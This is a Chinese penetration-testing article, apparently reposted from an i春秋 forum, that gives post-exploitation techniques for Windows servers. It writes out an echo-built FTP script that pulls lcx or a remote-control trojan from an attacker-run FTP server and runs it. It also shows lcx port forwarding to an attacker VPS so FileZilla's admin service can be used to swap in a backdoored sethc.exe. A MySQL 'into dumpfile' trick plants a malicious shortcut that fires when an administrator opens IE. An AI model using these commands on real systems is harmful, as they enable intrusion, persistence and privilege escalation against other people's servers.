本文来自i春秋作者:Binghe

目录

0x01 内网sa低权、内网注入点可os-shell情况适用

0x02 同第一个问题,但是站、库一体

0x03 目录权限的猥琐利用

0x04 FTP的一些利用方式

0x05 快捷方式调用powershell隐藏执行命令

0x01 内网sa低权、内网注入点可os-shell情况适用

(后者情况如是站裤分离,则目标机为数据库服务器)

mysql或许可以分割hex导出一个shell或lcx上去,mssql则不能 那么可以选择ftp,那么就会有人问你不是nc反弹的交互式,如何输入ftp密码?

其实可以批量执行,echo追加写文件,称为ftp下载者 先在外网搭建个ftp,帐号密码123,根目录放lcx或者是你的远控exe

echo open Ftp-ip>ftp.TXT //连接FTP
echo 123>>ftp.TXT       //输入用户名
echo 123>>ftp.TXT       //输入密码
echo get lcx c:lcx.exe>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //执行FTP.TXT文件中的FTP命令

然后你懂得 可以直接在下载到的路径运行你的muma或者lcx

0x02 同第一个问题,但是站、库一体

目标是web服务,当然可以用以上方法直接上服务器,但是问题来了,如果你的东西不免杀,或者他的ftp不可用咋办。 退而求其次,可以尝试echo往web目录shell,问题又来了,你没有web物理路径。 路径可以通过搜索文件得到,主页右键看源码得到一个生僻的js文件

dir /s/b 驱动器号:\example.js

驱动器ABCDEFG随便试试如果存在,会返回一个具体的绝对路径

接下来的事就不必多说了,双引号不影响脚本使用

0x03 目录权限的猥琐利用

比较累,不细说。拿到shell,可执行,但权限死,各种不成功可以试试微软的那个写入任意任意文件夹的0day,补丁就算了。

poc:https://github.com/monoxgas/Trebuchet

用法

Trebuchet.exe D:\1.txt c:\web\binghesec.asp

win8.1+net4.0测试效果(目录我已经设置了sys权限)

你也许会认为:“那又怎么样?你只是可以写入任意文件而已。 那我也只能呵呵 那么我们可不可以来个lpk.dll劫持?可不可以。。。 那么某些情况下的跨目录旁站写shell岂不是轻而易举?

0x04 FTP的一些利用方式

拿到shell后,权限很死,提权一筹莫展,程序的安装目录虽不可修改但可以访问,还可以下载。

如果遇到ftp等字眼,也许这就是转机。

  1. ServU和G6 FTP这类的数据库有默认口令,有时候还可以看配置文件,或者反编译servuadmin.exe得到口令,可以间接执行命令,不再多说。
  2. filezilla这类ftp服务一般不允许外部IP连接,可以把lcx端口转出来再连接(他的默认服务端口是14147)。把整个目录打包到本地,避免版本错误。

自己的vps执行:

lcx.exe -l 3333 4444

再将服务端的14147端口转发到lcx监听的3333端口上,可以用脚本 ,也可以用lcx

在vps上打开打包的Filezilla,连接端口4444,连上之后就相当于在他服务器上打开ftp一样,现在来创建个C盘的ftp服务,然后上传一个你改写的sethc.exe替换c:\windows\system32目录的sethc.exe,然后你懂得

3.flashfxp这类的FTP服务,虽可以配置文件看到密码,但是可以整个软件目录打包到本地,然后打开用星号查看器得到密码,这个服务也许权限不太高,但有可能用来爆破其他服务的密码。

0x05 最近比较火的一种新型的攻击方式,快捷方式调用powershell隐藏执行命令

已有利用工具,来自俄罗斯的黑阔,感谢吐司大牛分享出来。

url一栏是打开快捷方式时私密打开的程序,最后一栏是前台打开的程序,其他任意,图标可更换 看下效果,果然生猛!

你可以用他恶作剧,我们来用他提权。 url填木马地址,start process填ie浏览器的或者其他桌面的图标,生成之后,替换桌面,然后。。。。 有的小伙伴就会问了,能替换到桌面图标了,权限就够高了,还提权干嘛,我说:低权限请参考本文0x03 另外我们可以结合mysql的导出功能,当udf失败时可以用,现在高版本的mysql都不能udf提权了,我给大家做个例子 生成快捷方式之后存在本机磁盘,例:e:\IE

然后

select hex(load_file('e:/ie')) into dumpfile 'e:/1.txt';

打开e:\1.txt,复合里面16进制内容的code 然后在目标的mysql执行

select 0x(code,不需要括号) into dumpfile '目标桌面的IE快捷方式路径';

这样。当管理员在服务器开IE时,就。。。,

总结:

渗透测试所遇情况千变万化,哪里有真正的总结 仅作测试,请勿非法攻击。

本文由i春秋学院提供:http://bbs.ichunqiu.com/thread-10718-1-1.html?from=paper


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/32/